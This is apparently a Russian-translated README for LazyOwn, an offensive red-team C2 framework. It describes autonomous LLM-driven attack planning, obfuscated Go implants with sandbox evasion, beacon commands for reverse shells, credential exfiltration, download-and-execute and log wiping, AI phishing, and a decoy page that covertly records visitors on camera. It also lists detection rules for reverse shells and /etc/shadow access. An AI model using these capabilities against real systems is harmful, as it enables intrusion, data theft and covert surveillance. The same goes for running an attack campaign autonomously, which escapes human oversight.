proc_scan Подозрительные имена процессов
net_scan Необычные соединения/порты
log_analyze Аномалии auth/syslog
fim_scan Изменения целостности файлов
redteam_hunt Паттерны охоты за угрозами
sigma_rules 10 правил Sigma (mimikatz, reverse shell, privesc, nmap, webshell, /etc/shadow, cron, SMB, exfil, injection)

Движок обнаружения правил Sigma (LazyOwnBT lazyownbt/detection.py):

ID Правило Уровень
LAZYOWN-001 Дамп учетных данных Mimikatz критический
LAZYOWN-002 Паттерн Reverse Shell критический
LAZYOWN-003 Повышение привилегий через Sudo высокий
LAZYOWN-004 Обнаружено сканирование Nmap средний
LAZYOWN-005 Выполнение Webshell критический
LAZYOWN-006 Внедрение процесса высокий
LAZYOWN-007 Доступ к /etc/shadow критический
LAZYOWN-008 Постоянство через Cron высокий
LAZYOWN-009 Боковое перемещение SMB высокий
LAZYOWN-010 Экфилизация данных высокий

Выходные файлы: - sessions/purple_dataset.csv — обучающий набор для ML - sessions/purple_audit.jsonl — полный журнал аудита - sessions/detection_feedback.jsonl — калибровка оракула

Примечание: Для production-использования интегрируйте с реальным SIEM (Wazuh, Elastic SIEM, Splunk) через пересылку журналов auditd. Встроенные правила Sigma предназначены только для офлайн-тестирования.

Hive Mind — skills/hive_mind.py

Мультиагентная архитектура queen+drone с общей памятью: - QueenBrain (Claude): высокоуровневая оркестрация + ConsensusProtocol для действий с высоким риском - DronePool (Groq/Ollama): параллельное выполнение задач recon/exploit/cred/lateral/privesc - HiveMemory: семантическая ChromaDB + эпизодическая SQLite + долгосрочное хранение Parquet - EpisodeReflectionEngine: извлечение уроков после кампании, сохранив sessions/campaign_lessons.jsonl

Автономный интеллект кампании (ACI) — skills/aci_planner.py

Первый C2-фреймворк, который планирует, выполняет и учится автономно.

ACI устраняет разрыв между целью взаимодействия на естественном языке и полностью автономным циклом выполнения. Ни один конкурент (Cobalt Strike, Sliver, Havoc, Metasploit) не делает это от начала до конца:

Operator: "Compromise the domain controller at corp.internal
           starting from a phishing foothold on 10.10.11.5"
         ↓
ACI Planner ──► MITRE ATT&CK decomposition (LLM-backed, static fallback)
                 recon → exploit → exec → privesc → cred → lateral → report
         ↓
ObjectiveStore ─► 20+ concrete objectives injected into sessions/objectives.jsonl
         ↓
auto_loop / autonomous_daemon ─► executes each objective autonomously
         ↓
ACIEngine monitors ─► detects stalled phases (blocked_count ≥ 3)
         ↓
ACIReplan ──► LLM generates alternative techniques for blocked phases
         ↓
ACIReflector ──► appends lessons to sessions/campaign_lessons.jsonl
                 feeds back into the next engagement

Три MCP-инструмента:

Инструмент Что делает
lazyown_aci_plan Разложить цель → план ATT&CK → внедрить задачи
lazyown_aci_status Живая разбивка по фазам, % выполнения, рекомендация по перепланированию
lazyown_aci_replan Принудительное адаптивное перепланирование при застое; автоматическая генерация уроков

Быстрый старт:

# 1. Submit the engagement goal
lazyown_aci_plan(
    goal="Compromise the DC at corp.internal",
    target="10.10.11.5",
    scope=["10.10.11.0/24"],
    domain="corp.internal",
    os_hint="windows",
)

# 2. Start autonomous execution
lazyown_auto_loop(target="10.10.11.5", max_steps=20)

# 3. Monitor progress
lazyown_aci_status()

# 4. When blocked (blocked_count >= 3)
lazyown_aci_replan(reason="Kerberoasting blocked by AV, try AS-REP roasting")

Что делает ACI уникальным по сравнению с другими инструментами:

  • Cobalt Strike / Sliver / Havoc — это C2-фреймворки — оператор планирует каждый шаг
  • Metasploit имеет автоматизацию, но не имеет интеллекта
  • CALDERA эмулирует фиксированные процедуры ATT&CK, но не может адаптироваться к новым средам
  • ACI планирует, выполняет, перепланирует и учится — непрерывно, между взаимодействиями

Постоянство:

Файл Содержимое
sessions/aci_plan.json Активный план: фазы, задачи, состояние завершения
sessions/aci_history.jsonl Архив завершенных/заброшенных планов
sessions/campaign_lessons.jsonl Уроки, извлеченные ACIReflector

Использование CLI (автономно):

python3 skills/aci_planner.py plan "Compromise DC" --target 10.10.11.5 --os windows
python3 skills/aci_planner.py status
python3 skills/aci_planner.py replan "technique blocked"
python3 skills/aci_planner.py reflect

Автономный демон — skills/autonomous_daemon.py

Четыре роли asyncio в одном процессе — Claude не требуется между шагами:

Role 1 — ObjectiveLoop      : watches objectives.jsonl, takes + executes
Role 2 — ExecutionEngine    : 6-layer cascade per step, RL Q-table feedback
  Reactive → Parquet → Bridge → SWAN(MoE+RL) → LLM → Fallback
Role 3 — WorldModelWatcher  : graph centrality + pivot candidate tracking
Role 4 — DroneCoordinator   : hive drone spawning on recon/cred/service findings

Включите SWAN в демоне: export AUTO_USE_SWAN=1 перед запуском.

ACI передает данные в демон: задачи, внедренные lazyown_aci_plan, автоматически подхватываются Ролью 1 (ObjectiveLoop) — дополнительная настройка не требуется.

Графовые рассуждения — modules/world_model.py

NetworkGraph отслеживает все обнаруженные связи (хосты, службы, учетные данные, пути доверия) и вычисляет нормализованную центральность по степени для выявления кандидатов на пивотинг. Топ-3 кандидатов внедряются в каждый вызов to_context_string(), гарантируя, что автономный цикл всегда знает цели бокового перемещения с наибольшей ценностью.

Защита границ авторизации

Red-team фреймворк, который читает свою цель из payload.json, имеет острый край: Случайный rhost запускает атакующие команды против неавторизованного хоста. Защитный ограничитель — это страховочная сетка. Каждая интерактивная команда проходит через единую точку контроля, которая проверяет активную цель на соответствие вашему авторизованному объему работ до выполнения команды.

(LazyOwn) > scope add 10.10.11.0/24       # CIDR, bare IP, hostname, or *.corp.local wildcard
(LazyOwn) > scope add dc.corp.local
(LazyOwn) > scope mode enforce            # off | warn (default) | enforce
(LazyOwn) > scope                         # show current scope and posture
  • Открытый по замыслу: бездействует, пока область пуста или режим off, поэтому существующие кампании не затрагиваются, пока вы не включите его. Любая внутренняя ошибка разрешает команду, а не блокирует оператора.
  • warn помечает атакующие команды вне области; enforce блокирует их до явного подтверждения (и отказывает в неинтерактивных сессиях).
  • Ограничиваются только атакующие категории kill-chain; отчетность, конфигурация и локальные помощники всегда выполняются. Новые атакующие команды do_* автоматически классифицируются.
  • Хранится в payload.json (scope, scope_enforcement); чистая логика находится в cli/scope_guard.py без какой-либо связи с оболочкой.

Воспроизводимая установка

Зависимости объявлены один раз в pyproject.toml (единый источник истины) и зафиксированы для воспроизводимой установки:

  • requirements.txt — кросс-платформенный основной замок (без CUDA-колес).
  • requirements-ml.txt — опциональный, тяжелый ML-стек (torch/CUDA, scikit-learn).
  • install.sh работает в строгом режиме и идемпотентен. Установка по умолчанию легкая; дополнительные опции включаются с помощью --with-ml (ML-стек 2 ГБ), --with-ollama (локальная среда LLM) и --with-tools (распространенные внешние бинарники).
  • Разработчикам: pip install -e .[ml,dev].

Ключевые возможности

  1. 606+ атакующих команд: полное покрытие kill-chain для Linux, Windows, macOS и BSD — разведка, перечисление, эксплуатация, повышение привилегий, боковое перемещение, доступ к учетным данным, C2, эксфильтрация и отчетность.
  2. Интерактивный CLI на основе cmd2: нечеткое автодополнение, настраиваемое приглашение в неоновом стиле, палитра команд (Ctrl+K), встроенные реактивные подсказки после каждой команды и панель управления Textual TUI.
  3. Интегрированный маркетплейс: yara_marketplace (10 встроенных правил: программы-вымогатели, C2, веб-шеллы, обфускация, повышение привилегий), nuclei_marketplace (500+ шаблонов), marketplace для плагинов и дополнений сообщества — все доступно через curses TUI.
  4. auto_pwn и hunt: автономное связывание эксплойтов и разведка на основе угроз — auto_pwn автоматически проходит фазы kill-chain, hunt выполняет целевое обнаружение на основе известных TTP.
  5. Единый движок пост-командных подсказок: умные предложения (подсказки kill-chain, про-советы, любопытство, автоподсказки) с рейтингом ELO, бейджами (First Blood, Arsenal Master, Kill Chain Master) и наградами VRI — геймифицированный опыт оператора.
  6. Автоматическая криптография сессий: auto_crypto шифрует чувствительные файлы сессий при выходе и расшифровывает при запуске (PBKDF2HMAC + Fernet), прозрачно для оператора.
  7. AI-нативная архитектура: маршрутизатор MoE (смесь экспертов), RL-обучение, оркестратор SWAN, мультиагентная система Hive Mind, планировщик ACI (автономная кампанийная разведка) — первый C2, который планирует, выполняет и учится автономно.
  8. Многоступенчатые обфусцированные Go-импланты: двухэтапная доставка XOR-закодированных beacon-ов с C-заглушками, каналы C2 с AES-256, обход VM/песочницы/отладчика, полиморфизм и стейджеры на основе LOLBAS. Протестировано на ядре 6.12 и Windows 10.0.20348.
  9. Linux BOF (Beacon Object Files): первая открытая C2-платформа с поддержкой BOF для Linux через ELF dlopen во время выполнения. API datap совместим с исходным кодом Windows BOF. Поддержка прямых системных вызовов и io_uring.
  10. Ловушка для синей команды: Flask-приманка записывает видео/аудио и делает снимки неавторизованных посетителей (операторов синей команды, исследующих C2), сохраняя их в sessions/captured_images.
  11. Поверхность атаки Bloodhound: загрузка ZIP-данных Bloodhound для отображения интерактивных графов поверхности атаки с фильтрацией и поиском, дополненных данными обнаружения lazynmap.
  12. AI-фишинговый движок: шаблоны электронных писем, созданные Groq/DeepSeek, с динамической генерацией URL, пикселями отслеживания, сокращением URL и созданием тестовых конечных точек.

  1. Приманка: если IP-адрес не совпадает с 127.0.0.1 или lhost, Flask покажет поддельный веб-сайт. Этот поддельный сайт записывает видео со звуком и делает снимки злоумышленника (sessions/captured_images), как мини-версия Storm Breaker, чтобы узнать, кто является оператором синей команды.

image

  1. Симуляция противника: расширенные возможности для генерации сессий операций красной команды, обеспечивающие тщательные и эффективные симуляции. adversay emulator

  2. Планирование задач: Используйте команду cron для планирования и автоматизации задач, обеспечивая постоянные симуляции угроз.

  3. Результаты в реальном времени: Получайте немедленную обратную связь и результаты оценки безопасности, обеспечивая своевременные и точные выводы.
  4. Возможности RAT и ботнета: Включает функции удаленного доступа и управления, позволяющие управлять ботнетами и постоянными угрозами.
  5. C2-фреймворк на основе ИИ: Действует как фреймворк командования и управления (C2), обеспечивая скрытую связь и контроль над скомпрометированными системами. Также включает множество ИИ-ботов для улучшения вашей OPSEC. Разработан на Flask и предоставляет удобный интерфейс для бесшовного взаимодействия. Теперь с возможностями обнаружения сети, позволяющими видеть поверхность атаки на карте клиента четко и интуитивно, с фильтрами и панелью поиска. Скоро появятся новые функции. image

vulnbot

  • C2 LazyAddon Creator: Пошаговые страницы /addons в панели C2 для создания интеграций lazyaddons/*.yaml без ручного редактирования YAML. Одна форма предоставляет все параметры аддона (имя, описание, автор, версия, включен, целевая ОС, триггерные службы, категория, тип модуля, тип установки, параметры, блок инструментов, дополнительные C2, переменные окружения) с подсказками, заполнителями и справкой по каждому полю. Чипы-заполнители ({rhost}, {url}, объявленные параметры и каждый ключ payload.json) можно перетаскивать в командные поля. Серверная валидация отклоняет небезопасные имена, обход пути, неизвестные заполнители и некорректные URL до записи файла; запись выполняется атомарно и безопасно (временный файл создается с ограниченными правами через mkstemp + fchmod, сбрасывается и синхронизируется, затем заменяется через os.replace). Страницы списка и предпросмотра YAML завершают жизненный цикл. Каждый изменяющий маршрут защищен CSRF. Контракт: lazyc2/addon_creator.py + lazyc2/blueprints/addons.py, покрыт тестами tests/test_addon_creator.py и мутационным шлюзом tests/run_mutation_addon_creator.py. 9. Не обнаруживаемые, обфусцированные и изменяемые GO-импланты: Команда с полезной нагрузкой по умолчанию обфусцирована. Вместо прямой загрузки beacon-модуля загружается заглушка (stub), созданная на C, которая загружает beacon, закодированный с помощью XOR-ключа. Затем он декодируется в памяти и выполняется во временном пути с уникальным именем для обхода обнаружения, используя svchost в Windows и lazyservice в Linux. Это двухэтапный имплант, протестированный на ядре 6.12 и Windows [Version 10.0.20348.3807]. Кроме того, добавлена альтернативная заглушка для Windows с использованием LOLBAS PS1 и Csharp, а также версия ebird3 в LOLBAS, использующая те же технологии. Go-beacon — это мультиплатформенный, необнаруживаемый и сильно обфусцированный имплант, предназначенный для продвинутых операций red teaming. Он обладает полиморфизмом, работает в настраиваемом скрытном режиме и обеспечивает безопасную связь через каналы с шифрованием AES-256. Beacon маскируется в среде, имитируя легитимный сетевой трафик, и обходит обнаружение, выявляя виртуальные машины, песочницы, контейнеры и отладчики, динамически адаптируя свое поведение. При минимальном занимаемом пространстве он поддерживает надежное обнаружение сети через перебор хостов с помощью ping и сканирование портов заданных целей. Имплант отлично справляется с эксфильтрацией конфиденциальных данных, включая приватные ключи, учетные данные AWS, учетные данные браузера и системные журналы. Он предлагает динамическое TCP-проксирование для перенаправления трафика, попытки повышения привилегий и очистку системных журналов. Постоянство достигается на Windows, Linux и macOS через запланированные задачи, systemd, crontab и LaunchAgents. Дополнительные возможности включают эмуляцию противника (MITRE ATT&CK), обфускацию временных меток файлов и сжатие каталогов для эксфильтрации. Созданный с использованием Go vet для проверки здоровья кода, имплант легко интегрируется с Docker-средами и микро-ВМ AWS Firecracker, что делает его краеугольным камнем современной инфраструктуры red team. Используя Cloudflare для обфускации трафика, имплант направляет связь через безопасные высокопроизводительные редиректоры для сокрытия C2-инфраструктуры. Go-бинарник защищен обфускацией Garble, что затрудняет реверс-инжиниринг и обнаружение по сигнатурам. На Windows имплант использует маскировку расширений, чтобы выдавать себя за безобидные файлы (например, .pdfx), и встраивает пользовательские иконки через rsrc для убедительной социальной инженерии.

image

Доступные команды beacon:

  • stealth_off прекратить скрытность, отключает скрытный режим, позволяя нормальную работу.
  • stealth_on войти в режим ниндзя, включает скрытный режим, минимизируя активность для избежания обнаружения.
  • download: download:[имя_файла] Загружает файл с C2 на скомпрометированный хост.
  • upload: [имя_файла]: Загружает файл со скомпрометированного хоста на C2.
  • rev: Устанавливает обратную оболочку (reverse shell) на C2, используя настроенный порт.
  • exfil: Эксфильтрирует конфиденциальные данные (например, SSH-ключи, учетные данные AWS, историю команд).
  • download_exec: download_exec:[url]: Загружает и выполняет бинарник по URL (только Linux, сохраняется в /dev/shm).
  • obfuscate: [имя_файла]: Обфусцирует временные метки файлов для затруднения криминалистического анализа.
  • cleanlogs: Очищает системные журналы (например, /var/log/syslog на Linux, журналы событий на Windows).
  • discover: Выполняет обнаружение сети, выявляя живые хосты через ping.
  • adversary:[id_atomic]: Выполняет тест эмуляции противника (MITRE ATT&CK), используя загруженные скрипты atomic redteam framework.
  • softenum: Перечисляет полезное программное обеспечение на хосте (например, docker, nc, python).
  • netconfig: Захватывает и эксфильтрирует сетевую конфигурацию (например, ipconfig на Windows, ifconfig на Linux).
  • escalatelin: Пытается повысить привилегии на Linux (например, через sudo -n или SUID-бинарники).
  • proxy:[listenip]:[listenport]:[targetip]:[targetport] Запускает TCP-прокси, перенаправляя трафик с listenAddr на targetAddr.
  • stop_proxy:[listenaddr] Останавливает TCP-прокси на указанном адресе.
  • portscan: Сканирует порты на обнаруженных хостах и настроенном rhost.
  • compressdir:[каталог]: Сжимает каталог в файл .tar.gz и эксфильтрирует его.
  • sandbox: Получить информацию о системе, является ли она песочницей или нет.
  • isvm: Получить информацию о системе, является ли она виртуальной машиной или нет.
  • debug: Получить информацию о системе, отлаживается ли цель или нет.
  • persist: Попытка закрепиться в целевой системе.

Основные изменения в v0.2.158

Единая цепочка атак (единый источник истины)

  • Модуль modules/killchain.py вычисляет фазу; каждый интерфейс (CLI /killchain, /api/killchain, C2 /api/data+/api/dashboard, панель GUI2) отображает её snapshot().
  • История команд маяка для каждого импланта: /api/beacon_results/<client_id>, поддерживается модулем modules/beacon_history.py (JSONL, безопасные пути).
  • CLI /killchain auto on|off|N — живое автообновление; флаги killchain_auto_every / killchain_auto_on_phase_change.
  • C2 расшифровывает состояние сессии при запуске и повторно шифрует при чистом выходе, поэтому маяки и цепочка атак отражают реальные значения, пока сервер работает.

Маркетплейс (YARA + Nuclei)

Просмотр, поиск и установка из единого TUI-маркетплейса: - yara_marketplace list|search|install|info — 10 встроенных правил (ransomware, C2, веб-оболочки, обфускация, повышение привилегий) - nuclei_marketplace list|search|install|info — 500+ шаблонов из ~/nuclei-templates - marketplace list|search|install|update — 120+ YAML-аддонов, 56 плагинов, 69 инструментов

auto_pwn и hunt

  • auto_pwn — автономное прохождение цепочки атак от разведки до эксплуатации
  • hunt — разведка на основе угроз: сопоставляет известные TTP с обнаруженными сервисами

Реактивная аналитика

  • Механизм подсказок после команд: подсказки по цепочке атак, профессиональные советы, награды за любопытство
  • Рейтинг ELO, бейджи (First Blood, Arsenal Master, Kill Chain Master)
  • Встроенные реактивные подсказки: предложения «следующей команды» после каждого действия

Автоматическая криптография

Прозрачное шифрование сессии при выходе / расшифровка при запуске через PBKDF2HMAC + Fernet.

Новые плейбуки

7 профилей APT: Azure Graph API, CICD Poisoning, Entra Connect, macOS TCC, OAuth Token Theft, SCCM/MECM, VDI Breakout.

Интерактивный режим цепочки

chainmode on запускает поток цепочек, управляемый моделью мира: после каждой команды оболочка предлагает ранжированные следующие шаги (Enter = лучший вариант, 1..N = ранжированная альтернатива, любая команда = переопределение, skip = ручной режим, ESC/Ctrl+C/off = выход). Неверные выборы повторно запрашиваются вместо молчаливого пропуска, и поток автоматически приостанавливается после max_steps связанных команд. Состояние сохраняется в sessions/chain_mode.json (атомарные записи). Контракт: cli/chain_mode.py + cli/command_chain.py.

Полировка функций (UX + усиление безопасности)

  • Подсказки с подтверждением: каждая рекомендация несёт глагол, уверенность ([0, 99], никогда не нечестные 100%), причину и происхождение. Контракт: cli/reactive_hints.py + cli/recommendation_signals.py.
  • Единый механизм советов полностью отображается через rich (без сырых ANSI-escape); текст советов из реестра никогда не может сломать отображение разметки. Контракт: cli/tips_engine.py.
  • cli/noise_verbs.py — единый источник истины для списков неинформативных глаголов, используемых подсказками, советами и режимом цепочки.
  • Привязка API-ключей к тенанту: core/api_authz.py теперь реализует документированное окно ротации, копирует разрешения из ротированного ключа (исправлен регресс), возвращает JSON 401/403 (безопасно с TRAP_HTTP_EXCEPTIONS), и конечная точка C2 /api/health/tenant реально применяется. Проверка мутаций: tests/run_mutation_api_authz.py (7/7 убито).
  • core/logging.py install_json_handler сохраняет существующие обработчики и идемпотентен.
  • Структурированная синхронизация ELO учитывает перенаправленные пути пользовательского хранилища, и тесты не зависят от входа в систему.

Возможности команд

LazyOwn предоставляет 606+ команд в 13 фазах цепочки атак, доступных как из CLI, так и из веб-панели C2:

Фаза Ключевые команды
Разведка lazynmap, ping, whatweb, gobuster, ffuf, dig, dnsenum, finalrecon
Перечисление enum4linux, cme, bloodhound, nuclei, kerbrute, ldapdomaindump
Эксплуатация auto_pwn, hunt, ss (searchsploit), venom, lazymsfvenom, searchhash
Пост-эксплуатация linpeas, winpeas, blacksandbeacon, mimikatzpy, disableav
Закрепление persist, backdoor, cron, schtask, createwebshell
Повышение привилегий getcap, sudo, adcs_check, privesc_predictor
Доступ к учётным данным secretsdump, evil, getnpusers, hashcat, john, spraykatz
Горизонтальное перемещение psexec, wmiexec, ssh_cmd, chisel, ligolo, bloodhound
Эксфильтрация exfil, upload_gofile, encrypt/decrypt, compressdir
C2 lazyc2, blacksandbeacon, createrevshell, listener_go
Отчёты report, lazyreport, campaign_sitrep, timeline, dashboard
ИИ/Агенты auto_loop, recommend_next, playbook_generate, playbook_run, orchestrate
Маркетплейс yara_marketplace, nuclei_marketplace, marketplace, lab
Основное управление: assign, show, doctor, wizard, scope, collab_join, config_banner, palette, fz.

Полный справочник по 606 командам см. в COMMANDS.md, а 18 команд, покрывающих 80% задач, — в ESSENTIALS.md.

Расширение LazyOwnShell с помощью Lua-плагинов

В этом документе объясняется, как использовать Lua-скрипты для расширения функциональности приложения LazyOwnShell, построенного на основе фреймворка cmd2 на Python. Lua позволяет создавать собственные плагины, которые могут добавлять новые команды, изменять существующее поведение или получать доступ к данным приложения.

image


Содержание

  1. Введение
  2. Настройка Lua-плагинов
  3. Написание Lua-плагинов
  4. Регистрация новых команд
  5. Доступ к данным приложения
  6. Обработка ошибок
  7. Примеры плагинов
  8. Лучшие практики

1. Введение

Приложение LazyOwnShell поддерживает Lua-скрипты, позволяя пользователям расширять его функциональность без изменения основного кода Python. Lua-скрипты (плагины) хранятся в каталоге plugins/ и автоматически загружаются при запуске приложения.

Lua-плагины могут: - Добавлять новые команды в оболочку. - Изменять существующие команды или поведение. - Получать доступ к данным приложения, предоставляемым Python, и управлять ими.


2. Настройка Lua-плагинов

Чтобы использовать Lua-плагины, убедитесь в следующем:

  1. Установите библиотеку lupa в вашем Python-окружении: bash pip install lupa bash plugins/ init_plugins.lua hello.lua goodbye.lua При запуске приложения выполняется файл init_plugins.lua, который загружает все остальные .lua-файлы в каталоге plugins/.

  2. Написание Lua-плагинов Lua-плагин — это файл сценария с расширением .lua, размещённый в каталоге plugins/. Каждый плагин может определять функции и регистрировать их как команды в оболочке.

Структура Lua-плагина

```lua -- Определяем функцию для новой команды function my_command(arg) -- Ваша логика здесь print("Это новая команда: " .. (arg or "по умолчанию")) end

-- Регистрируем функцию как команду
register_command("my_command", my_command)

``` Ключевые функции - register_command(command_name, lua_function): - Регистрирует новую команду в оболочке. - command_name: имя команды (например, hello). - lua_function: функция Lua, которая выполняется при вызове команды.

  1. Регистрация новых команд

    Чтобы добавить новую команду в оболочку, выполните следующие шаги:

  • Определите функцию Lua, реализующую логику команды.
  • Используйте register_command для регистрации функции как команды.
  • Пример: добавление команды hello
  • Создайте файл plugins/hello.lua со следующим содержимым:

    ```lua function hello(arg) local name = arg or "мир" print("Привет, " .. name .. "!") end

    register_command("hello", hello) Теперь вы можете выполнить команду hello в оболочке:bash hello Lua Привет, Lua! ``` 4. Лучшие практики - Держите плагины модульными : каждый плагин должен быть сосредоточен на одной функции или возможности. - Документируйте свои плагины : предоставьте четкую документацию для каждого плагина, включая примеры использования. - Тщательно тестируйте : тестируйте плагины изолированно перед интеграцией в основное приложение. - Корректно обрабатывайте ошибки : используйте pcall для обработки ошибок в Lua-плагинах и предотвращения сбоев.

Используя Lua-скрипты, вы можете расширить функциональность LazyOwnShell без изменения основного кода Python. Это обеспечивает большую гибкость и настройку, позволяя пользователям писать собственные плагины для удовлетворения конкретных потребностей. Удачного кодинга!

Система LazyAddons на основе YAML

Расширение возможностей LazyOwn RedTeam Framework стало проще, чем когда-либо, даже для не-программистов, благодаря системе LazyAddons, которая позволяет расширять функциональность с помощью YAML-файлов.

Декларативное создание команд через YAML-файлы конфигурации.

Структура файлов

lazyaddons/ ├── addon1.yaml ├── addon2.yaml └── example.yaml

🛠️ Определение аддона

Минимальный пример

name: "shortname"  # CLI command (do_shortname)
enabled: true
description: "Tool description for help system"

tool:
  name: "Full Tool Name"
  repo_url: "https://github.com/user/repo"
  install_path: "tools/toolname"
  execute_command: "python tool.py -u {url}"

Расширенная конфигурация

params:
  - name: "url"
    required: true
    description: "Target URL"
    default: "http://localhost"

  - name: "threads"
    required: false
    default: 4

Возможности Автоустановка Инструменты клонируются из Git, если они отсутствуют:

git clone <repo_url> <install_path>

Подстановка параметров Заменяет {param} в командах значениями из:

  • Аргументов команды
  • Значений по умолчанию
  • self.params
  • Интеграция справки

help <команда> отображает описание из YAML.

Шаблон

name: ""
enabled: true
description: ""

tool:
  name: ""
  repo_url: ""
  install_path: ""
  install_command: ""  # Optional
  execute_command: ""

params:
  - name: ""
    required: true/false
    default: ""
    description: ""

▶️ Использование Поместите YAML-файлы в lazyaddons/

Запустите ваше CLI-приложение

Выполните зарегистрированные команды:

(Cmd) help your_command
(Cmd) your_command -args

🚨 Устранение неполадок Отсутствующие параметры: проверьте обязательные поля в YAML

Ошибки установки: проверьте доступ к сети/git

Ошибки команд: проверьте синтаксис execute_command

Ключевые особенности: - Чистый markdown в стиле GitHub - Ориентация только на YAML-аддоны - Включает готовые шаблоны - Описывает систему подстановки параметров - Содержит советы по устранению неполадок

Хотите, чтобы я добавил конкретные примеры или сценарии использования?

LazyOwnGris3

LazyOwn на Reddit

Революционизируйте ваш пентест с LazyOwn: автоматизируйте вторжение на Linux, MAC OSX и Windows ЖЕРТВ

https://www.reddit.com/r/LazyOwn/

https://github.com/grisuno/LazyOwn/assets/1097185/eec9dbcc-88cb-4e47-924d-6dce2d42f79a

Откройте для себя LazyOwn — идеальное решение для автоматизации рабочего процесса пентеста для атак на системы Linux, MacOSX и Windows. Наш мощный инструмент упрощает пентест, делая его более эффективным и действенным. Посмотрите это видео, чтобы узнать, как LazyOwn может оптимизировать ваши оценки безопасности и расширить ваш набор кибербезопасности.

LazyOwn> assign rhost 192.168.1.1
[SET] rhost set to 192.168.1.1
LazyOwn> run lazynmap
[INFO] Running Nmap scan on 192.168.1.1
...

LazyOwn идеально подходит для специалистов по кибербезопасности, которым нужно централизованное и автоматизированное решение для задач пентеста, экономящее время и повышающее эффективность выявления и эксплуатации уязвимостей.

Captura de pantalla 2024-05-22 021136

Требования

  • Python 3.x
  • Модули Python: - requests - python-libnmap - pwncat-cs - pwn - groq - PyPDF2 - docx - python-docx - olefile - exifread - pycryptodome - impacket - pandas - colorama - tabulate - pyarrow - keyboard - flask-unsign - name-that-hash - certipy-ad - ast - pykeepass - cmd2 - Pillow - netaddr - stix2 - pyautogui
  • subprocess (входит в стандартную библиотеку Python)
  • platform (входит в стандартную библиотеку Python)
  • tkinter (необязательно для GUI)
  • numpy (необязательно для GUI)

Установка

  1. Клонируйте репозиторий:
git clone https://github.com/grisuno/LazyOwn.git
cd LazyOwn
  1. Установите зависимости Python:
./install.sh

Использование

image

./run or ./fast_run_as_r00t.sh

./run --help
    [;,;] LazyOwn vvvrelease/0.2.8
    Usage: ./run [Options]
    Options:
      --help             Show this help panel.
      -v                 Show version.
      -p <payloadN.json> Exec with different payload.json example. ./run -p payload1.json, (Special for RedTeams)
      -c <command>       Exec a command using LazyOwn example: ping
      --no-banner        No Banner
      -s                 Run as root
      --old-banner       Show old Banner


./fast_run_as_r00t.sh --vpn 1 (the number id of your file in vpn directory)
Use assign <parameter> <value> to configure parameters.
Use show to display the current parameter values.
Use run <script_name> to execute a script with the set parameters.
Use exit to exit the CLI.

Once the shell is running, you can use the following commands:

list: Lists all LazyOwn Modules.
assign <parameter> <value>: Sets the value of a parameter. For example, assign rhost 192.168.1.1.
show: Displays the current values of all parameters.
run <script>: Executes a specific script available in the framework.
Available Scripts

┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env)
└╼ $ help

01. Reconnaissance
──────────────────
alterx        finalrecon       ping             trace                  
apache_users  getcap           ports            trufflehog             
binarycheck   gospider         proxy            tshark_analyze         
cve           graudit          recon            waybackmachine         
dig           httprobe         serveralive2     whatweb                
dnschef       ipinfo           sherlock         windapsearchscrapeusers
dnsenum       launchpad        sslscan        
dnsmap        metabigor        tcpdump_capture
dnstool_py    openssl_sclient  tcpdump_icmp   

02. Scanning & Enumeration
──────────────────────────
ad_ldap_enum  enum4linux_ng     nbtscan              rpcdump             wpscan
allin         evil_ssdp         net_rpc_addmem       rpcmap_py         
amass         feroxbuster       netexec              samrdump          
arjun         finger_user_enum  netview              sawks             
arpscan       fuzz              nikto                sessionssh        
batchnmap     getnpusers        nmapscript           skipfish          
bbot          gobuster          nuclei               smbattack         
blazy         hound             odat                 smbclient         
bloodhound    kerbrute          openredirex          smbclient_impacket
breacher      lazynmap          osmedeus             smbclient_py      
certipy       ldapdomaindump    parsero              smbmap            
certipy_ad    ldapsearch        parth                smtpuserenum      
changeme      lookupsid         portdiscover         snmpcheck         
cme           lookupsid_py      portservicediscover  snmpwalk          
davtest       loxs              pre2k                swaks             
dirsearch     lynis             pykerbrute           vscan             
dmitry        magicrecon        rdp_check_py         wfuzz             
enum4linux    mqtt_check_py     rpcclient            windapsearch      

03. Exploitation
────────────────
aclpwn_py         gettgtpkinit_py  psexec            sqlmap                    
addspn_py         greatSCT         psexec_py         sqsh                      
autoblody         img2cookie       py3ttyup          ss                        
cacti_exploit     jwt_tool         pyautomate        sshexploit                
commix            krbrelayx_py     pyoracle2         template_helper_serializer
cp                kusa             pywhisker         ticketer                  
createcookie      lazypwn          rejetto_hfs_exec  unicode_WAFbypass         
createdll         lfi              rev               upload_bypass             
digdug            lol              seo               utf                       
download_exploit  ms08_067_netapi  sharpshooter      winbase64payload          
downloader        ntpdate          shellfire         wrapper                   
eternal           owneredit        shellshock        www                       
excelntdonut      padbuster        sireprat          xss                       
filtering         powerserver      sqli              xsstrike                  
gets4uticket_py   printerbug_py    sqli_mssql_test 

04. Post-Exploitation
─────────────────────
add2find                     exe2bin              pezorsh              
adversary                    exe2donutbin         pip_proxy            
adversary_yaml               extract_yaml         pip_repo             
aes_pe                       find                 powershell_cmd_stager
ai_playbook                  follina              rmfromfind           
apt_proxy                    hex2shellcode        rubeus               
apt_repo                     internet_proxy       scavenger            
atomic_lazyown               issue_command_to_c2  scp                  
bin2shellcode                lazywebshell         service_ssh          
convert_remcomsvc_from_file  mimikatzpy           sessionsshstrace     
cports                       msfshellcoder        shellcode            
create_synthetic             ofuscate_string      shellcode2elf        
createpayload                ofuscatesh           shellcode2sylk       
d3monizedshell               ofuscatorps1         shellcode_search     
disableav                    path2hex             ssh_cmd              

05. Persistence
───────────────
asprevbase64       ftp                msfpc                 setoolKits
backdoor_factory   generate_revshell  paranoid_meterpreter  ssh       
conptyshell        grisun0            pwncat                toctoc    
createrevshell     grisun0w           pwncatcs              veil      
createwebshell     ivy                rdp                   weevely   
createwinrevshell  knokknok           revwin                weevelygen
darkarmour         listener_go        scarecrow           
dr0p1t             listener_py        service             

06. Privilege Escalation
────────────────────────
responder  smbserver

07. Credential Access
─────────────────────
addusers                cred          john2hash        rocky           
adsso_spray             creds_py      john2keepas      searchhash      
cewl                    crunch        john2zip         smalldic        
crack_cisco_7_password  cubespraying  keepass          spraykatz       
createcredentials       dacledit      medusa           sshkey          
createhash              generatedic   passtightvnc     sudo            
createmail              hashcat       passwordspray    transform       
createusers_and_hashs   hydra         refill_password  username_anarchy

08. Lateral Movement
────────────────────
addcli     id_rsa           penelope         sshd               wifipass  
